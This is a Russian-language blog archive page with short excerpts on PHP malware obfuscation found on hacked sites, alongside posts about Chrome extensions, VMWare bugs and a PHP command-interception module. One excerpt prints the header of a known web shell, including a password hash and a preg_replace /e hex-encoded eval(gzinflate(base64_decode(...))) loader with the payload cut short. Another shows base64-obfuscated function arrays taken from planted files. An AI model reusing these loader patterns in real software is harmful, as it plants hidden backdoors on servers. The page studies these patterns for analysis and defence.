Архив за месяц: Февраль 2012

Скрытие кода, метод 8

<?php # Web Shell by oRb $auth_pass = "63a9f0ea7bb98050796b649e85481845"; $color = "#df5"; $default_action = ‘FilesMan’; $default_use_ajax = true; $default_charset = ‘Windows-1251’; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66 \x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F \x64\x65\x28’5b1pdx…Kn6fwE=’\x29\x29\x29\x3B",".");?> Чертовски гениально!) preg_replace ничего не заменяет, а просто выполняет роль eval(), выполняя весь код из второго аргумента! pattern Искомый шаблон. Может быть как строкой, так и массивом строк. Также доступны некоторые… Читать далее »

Ручная установка расширений Google Chrome

Проблема достаточно редкая, поэтому Google на нее просто забили и игнорируют мольбы пользователей ее устранить. Если Виндовс установлена на динамический диск (dynamic disk), расширения не устанавливаются, показывая ошибку: “Не удается распаковать расширение. Для безопасной распаковки расширения необходим путь к каталогу вашего профиля, начинающийся с буквы диска. Он не должен содержать параметр слияния папок, точку монтирования… Читать далее »

Скрытие кода, метод 7

Следующих код был взят из двух файлов, залитых на взломанный сайт. В каждом из файлов код состоял из трех блоков. Первый блок был почти одинаковым, массив функций, закодированный в base64: $GLOBALS[‘_482181972_’] = Array( base64_decode( ‘Z’ .’mlsZ’ .’V9′ .’nZ’ .’XRfY29u’ .’dGV’ .’udHM’ .’=’ ), // file_get_contents base64_decode( ‘c3Ry’ .’c’ .’G’ .’9z’ ), // strpos base64_decode( ‘ZmlsZW10’… Читать далее »

Function hijaking

Перехват функций – архиполезная штука. Если нет возможности изобрести пяттиколесный велосопед, поймать опасную функцию (системную команду) за хвост можно с помощью модуля Baxtep (спасибо Андрею). Baxtep – PHP security extension to intercept execution of system commands. Для сборки модуля понадобятся пара прямых рук и такие команды: # скачиваем с репозитория svn checkout https://baxtep.googlecode.com/svn/trunk/ baxtep #… Читать далее »

Скрытие кода, метод 6: ionCube HTML obfuscator

На сайте ionCube случайно заметил бесплатную плюшку – Free Obfuscating HTML Encoder. Захотелось посмотреть и раскодировать) Закодированная страница в примере на сайте выглядит следующим образом: <script language=javascript> c="e66x75…Y7dF7d"; // [1] first long string eval(unescape("%64%3d…%22%3b")); // [2] second long string x("C3Bomk…4ApQkS"); // [3] third long string </script> В оригинале весь код располагается в одну строку. В… Читать далее »

Microsoft Facepalm 2012

Майкрософт такой Майкрософт. Ну вот нахрена им люди в техподдержке, если на вопросы живых людей они отвечают как роботы-имбецилы? Задал 4 вопроса, ответили куском текста с сайта, ну не ептель? Нахрена вообще такая “техподдержка”? Маразм крепчает…

VMWare + physical drive vs Android

Некоторое время назад я описывал способ лечения VMWare, которая отказывалась открывать физический диск. С того времени еще не раз сталкивался с прекрасным. Bug #2 Второй баг обнаружился вот просто только что. Перезагрузил Виндовс после установки обновлений и VMWare выдала свое феерическое: The physical disk is already in use (73). Проклиная VMWare Не понимая, что происходит,… Читать далее »